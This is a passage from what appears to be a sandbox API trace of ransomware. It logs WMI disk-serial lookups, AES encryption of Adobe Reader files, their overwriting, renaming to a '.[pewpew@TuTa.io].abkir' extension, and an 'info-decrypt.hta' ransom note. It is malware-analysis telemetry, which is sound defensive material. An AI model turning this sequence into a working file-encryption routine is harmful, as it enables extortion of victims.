SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.137] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.137] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36a8f7c*=8, plFlavor=0x36a8f80*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36a8f7c*=8, plFlavor=0x36a8f80*=0) returned 0x0 [0196.137] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.137] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.137] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", lpFilePart=0x0) returned 0x35 [0196.137] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x58 [0196.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0196.137] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x2e0726c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0196.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0196.138] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0196.138] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", lpFilePart=0x0) returned 0x36 [0196.139] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0196.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0196.139] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0196.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0196.139] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", lpFilePart=0x0) returned 0x36 [0196.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0196.139] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm"), fInfoLevelId=0x0, lpFileInformation=0x36a94b4 | out: lpFileInformation=0x36a94b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80815880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4623)) returned 1 [0196.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0196.140] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", lpFilePart=0x0) returned 0x36 [0196.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0196.140] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0196.141] GetFileType (hFile=0x4a8) returned 0x1 [0196.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0196.141] GetFileType (hFile=0x4a8) returned 0x1 [0196.141] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4623 [0196.141] ReadFile (in: hFile=0x4a8, lpBuffer=0x36a968c, nNumberOfBytesToRead=0x4623, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x36a968c*, lpNumberOfBytesRead=0x8f6eedc*=0x4623, lpOverlapped=0x0) returned 1 [0196.168] CloseHandle (hObject=0x4a8) returned 1 [0196.168] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0x66bbb70) returned 1 [0196.169] CryptGenRandom (in: hProv=0x66bbb70, dwLen=0x10, pbBuffer=0x36ae004 | out: pbBuffer=0x36ae004) returned 1 [0196.649] CryptImportKey (in: hProv=0x66bbb70, pbData=0x36f9430, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f250) returned 1 [0196.649] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.649] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.649] CryptDuplicateKey (in: hKey=0xb7f250, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7fc10) returned 1 [0196.649] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.650] CryptSetKeyParam (hKey=0xb7fc10, dwParam=0x4, pbData=0x36f9510*=0x1, dwFlags=0x0) returned 1 [0196.650] CryptSetKeyParam (hKey=0xb7fc10, dwParam=0x1, pbData=0x36f94dc, dwFlags=0x0) returned 1 [0196.650] CryptEncrypt (in: hKey=0xb7fc10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36f9520*, pdwDataLen=0x8f6eea8*=0x4630, dwBufLen=0x4630 | out: pbData=0x36f9520*, pdwDataLen=0x8f6eea8*=0x4630) returned 1 [0196.650] CryptEncrypt (in: hKey=0xb7fc10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36fdb74*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36fdb74*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0196.652] CryptDestroyKey (hKey=0xb7f250) returned 1 [0196.652] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0196.652] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0196.652] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", lpFilePart=0x0) returned 0x36 [0196.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0196.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x328 [0196.652] GetFileType (hFile=0x328) returned 0x1 [0196.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0196.652] GetFileType (hFile=0x328) returned 0x1 [0196.653] WriteFile (in: hFile=0x328, lpBuffer=0x36fe17c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x36fe17c*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0196.654] CloseHandle (hObject=0x328) returned 1 [0196.654] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0196.654] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0196.654] CoTaskMemFree (pv=0xbed438) [0196.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0196.654] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0196.655] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0196.655] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0196.655] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.656] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027930) returned 0x0 [0196.656] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027930, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0196.656] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027930, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x60314a0) returned 0x0 [0196.656] WbemDefPath:IUnknown:Release (This=0x6027930) returned 0x0 [0196.656] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x60314a0) returned 0x0 [0196.656] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0196.656] WbemDefPath:IUnknown:AddRef (This=0x60314a0) returned 0x3 [0196.656] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0196.656] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0196.656] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ccc38) returned 0x0 [0196.656] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.656] WbemDefPath:IUnknown:Release (This=0x66ccc38) returned 0x3 [0196.656] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0196.657] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0196.657] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0196.657] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x2 [0196.657] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x1 [0196.657] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0196.657] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0196.657] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x60314a0) returned 0x0 [0196.657] WbemDefPath:IUnknown:AddRef (This=0x60314a0) returned 0x3 [0196.657] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x2 [0196.657] WbemDefPath:IWbemPath:SetText (This=0x60314a0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetInfo (in: This=0x60314a0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetInfo (in: This=0x60314a0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetInfo (in: This=0x60314a0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0196.657] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.657] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0196.658] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0196.658] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0196.658] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.658] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027950) returned 0x0 [0196.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027950, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0196.659] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027950, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6031510) returned 0x0 [0196.659] WbemDefPath:IUnknown:Release (This=0x6027950) returned 0x0 [0196.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6031510) returned 0x0 [0196.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0196.659] WbemDefPath:IUnknown:AddRef (This=0x6031510) returned 0x3 [0196.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0196.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0196.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66cca88) returned 0x0 [0196.659] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cca88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.659] WbemDefPath:IUnknown:Release (This=0x66cca88) returned 0x3 [0196.659] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0196.659] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0196.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0196.659] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x2 [0196.659] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x1 [0196.660] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0196.660] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0196.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6031510) returned 0x0 [0196.660] WbemDefPath:IUnknown:AddRef (This=0x6031510) returned 0x3 [0196.660] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x2 [0196.660] WbemDefPath:IWbemPath:SetText (This=0x6031510, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0196.660] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0196.660] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0196.660] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.660] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0196.660] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0196.660] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0196.660] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.661] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6024968) returned 0x0 [0196.661] WbemLocator:IUnknown:QueryInterface (in: This=0x6024968, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, 